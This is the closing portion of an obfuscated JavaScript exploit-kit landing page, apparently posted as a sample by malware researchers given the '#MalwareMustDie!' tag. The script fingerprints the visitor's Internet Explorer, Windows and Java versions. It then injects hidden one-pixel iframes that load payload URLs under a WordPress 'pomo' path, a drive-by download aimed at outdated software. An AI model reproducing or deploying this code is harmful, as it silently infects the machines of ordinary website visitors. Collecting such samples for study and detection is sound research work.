                            b = d.DOM.getTagStatus(i.HTML, i.DummySpanTagHTML, i.DummyObjTagHTML1, i.DummyObjTagHTML2, g, c);
                            h = f.pluginQuery(i.HTML.obj());
                            i.detected = b > 0 || h ? 1 : (b == -0.1 || b == -0.5 ? -0.5 : -1);
                            i.version = h ? h : null;
                            return i
                        }
                    }
                },
                zz: 0
            }
        };
        PluginDetect.INIT();

        function PcyjjcB(QXRwqr) {
            var NxZFu = PluginDetect.getVersion(QXRwqr);
            if (NxZFu != null) {
                return DzIEPNhc(NxZFu);
            } else {
                return null;
            }
        }

        function ipzPNmQxc(QEzGR) {
            if (QEzGR != null) {
                var BZIMlJFt = parseFloat(QEzGR[1] + "." + QEzGR[3]);
                if (QEzGR[0] == 1 && BZIMlJFt <= 6.32) {
                    TQGRXSEi();
                } else if (QEzGR[0] == 1 && BZIMlJFt <= 7.17) {
                    IuJKUxe();
                } /*else{IuJKUxe();}*/
            }
        }

        function nekTVLCFu() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h5', 'text/html');
        }

        function IuJKUxe() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h2', 'text/html');
        }

        function DzIEPNhc(NxZFu) {
            var MRZvEcxG = new Array;
            try {
                MRZvEcxG = NxZFu.split(',');
                for (jBxaKE = 0; jBxaKE < MRZvEcxG.size; jBxaKE++) {
                    MRZvEcxG[jBxaKE] = parseFloat(MRZvEcxG[jBxaKE]);
                }
            } catch (BeerBZu) {
                return null;
            }
            return MRZvEcxG;
        }

        function vZfpbBKzh() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h3', 'text/html');
        }

        function pPDjhQv() {
            return;
        }

        function eeguOzpz(UyEllYwYss) {
            if (UyEllYwYss != null) {
                var BZIMlJFt = parseFloat(UyEllYwYss[1] + "." + UyEllYwYss[2]);
                if (UyEllYwYss[0] == 9 && BZIMlJFt <= 3.4) {
                    VcXjat();
                }
                if (UyEllYwYss[0] == 9 && BZIMlJFt <= 4.0) {
                    pPDjhQv();
                } else if (UyEllYwYss[0] < 9) {
                    pPDjhQv();
                }
                if (UyEllYwYss[0] == 10 && UyEllYwYss[1] == 1) {
                    YjGGR();
                } /*else{pPDjhQv();}*/
            }
        }

        function fPVoBak() {
            var WLtIYJZDWQQ = UIlKdBdnO();
            if (WLtIYJZDWQQ != null) {
                if (WLtIYJZDWQQ == 'msie') {
                    try {
                        return parseFloat(CzdxtSXz.match(/msie ([\d]+)\.[\d]+/)[1]);
                    } catch (BeerBZu) {
                        return null;
                    }
                }
                if (WLtIYJZDWQQ == 'firefox') {
                    try {
                        return parseFloat(CzdxtSXz.match(/firefox\/([\d]+)\.[\d]+/)[1]);
                    } catch (BeerBZu) {
                        return null;
                    }
                }
            }
            return null;
        }

        function YQnBLMyY() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h6', 'text/html');
        }

        function PPnprFkcx() {
            var znQAdpi = 0;
            var IGwyvnqihKC = 0;
            try {
                znQAdpi = new ActiveXObject("SharePoint.OpenDocuments.4");
            } catch (e) {}
            try {
                IGwyvnqihKC = new ActiveXObject("SharePoint.OpenDocuments.3");
            } catch (e) {}
            if ((typeof znQAdpi) == "object" && (typeof IGwyvnqihKC) == "object") {
                return "2010";
            } else if ((typeof znQAdpi) == "number" && (typeof IGwyvnqihKC) == "object") {
                return "2007";
            }
            return null;
        }

        function KzRIuDdJ(QEzGR) {
            if (QEzGR != null) {
                if (QEzGR[0] == 1 && QEzGR[1] == 7 && QEzGR[3] <= 17) {
                    vZfpbBKzh();
                }
            }
        }

        function YnuLXRygeP() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h4', 'text/html');
        }

        function UIlKdBdnO() {
            if (CzdxtSXz.indexOf('msie') != -1 && CzdxtSXz.indexOf('opera') == -1 && CzdxtSXz.indexOf('webtv') == -1) {
                return 'msie'
            }
            if (CzdxtSXz.indexOf('opera') != -1) {
                return 'opera'
            }
            if (CzdxtSXz.indexOf('firefox') != -1) {
                return 'firefox';
            }
            return null;
        }

        function pMuJUQa() {
            return PcyjjcB("Java");
        }

        function VcXjat() {
            return;
        }

        function PXTLS(bVVpcDYN, UgfEmMfy) {
            try {
                var sevqAkcRBI = document.createElement('iframe');
                sevqAkcRBI.style.visibility = 'hidden';
                sevqAkcRBI.height = 1;
                sevqAkcRBI.src = bVVpcDYN;
                sevqAkcRBI.async = true;
                sevqAkcRBI.width = 1;
                sevqAkcRBI.type = UgfEmMfy;
                document.body.appendChild(sevqAkcRBI);
            } catch (BeerBZu) {
                return null;
            }
        }

        function TQGRXSEi() {
            PXTLS('/wp-includes/pomo/dtsrc.php?a=h7', 'text/html');
        }

        function xAtqjEshx() {
            var NVDGXp = fPVoBak();
            var hapkhUyCQ = UIlKdBdnO();
            var ZooVPohAB = KKYaG(); /*var pUcLru = PPnprFkcx();*/
            var uwRBqOEcl = zzaRNJ();
            if (hapkhUyCQ == 'msie' && NVDGXp == 7 && ZooVPohAB < 6) {
                nekTVLCFu();
                var QEzGR = pMuJUQa();
                if (QEzGR != null) {
                    setTimeout(function () {
                        ipzPNmQxc(QEzGR);
                    }, 3000);
                }
                return;
            }
            if (hapkhUyCQ == 'msie' && NVDGXp == 8 && ZooVPohAB < 6) {
                YQnBLMyY();
                var QEzGR = pMuJUQa();
                if (QEzGR != null) {
                    setTimeout(function () {
                        ipzPNmQxc(QEzGR);
                    }, 3000);
                }
                return;
            }
            if (hapkhUyCQ == 'msie' && NVDGXp == 6 && ZooVPohAB < 6) {
                YnuLXRygeP();
                var QEzGR = pMuJUQa();
                if (QEzGR != null) {
                    setTimeout(function () {
                        ipzPNmQxc(QEzGR);
                    }, 3000);
                }
                return;
            }
            var QEzGR = pMuJUQa();
            if (QEzGR != null && ZooVPohAB != null) {
                if (hapkhUyCQ == 'chrome') {
                    KzRIuDdJ(QEzGR);
                } else {
                    ipzPNmQxc(QEzGR);
                }
            }
        }

        function ekUwwyBtM() {
            return PcyjjcB("AdobeReader");
        }

        function YjGGR() {
            return;
        }

        function KKYaG() {
            try {
                return parseFloat(CzdxtSXz.match(/windows nt ([\d]+)\.[\d]+/)[1]);
            } catch (BeerBZu) {
                return null;
            }
        }

        function zzaRNJ() {
            if (CzdxtSXz.indexOf('wow64') != -1) {
                return '64';
            } else {
                return '32';
            }
        }
        var CzdxtSXz = navigator.userAgent.toLowerCase();
        xAtqjEshx();
    </script>
</body>

</html>

-----
#MalwareMustDie!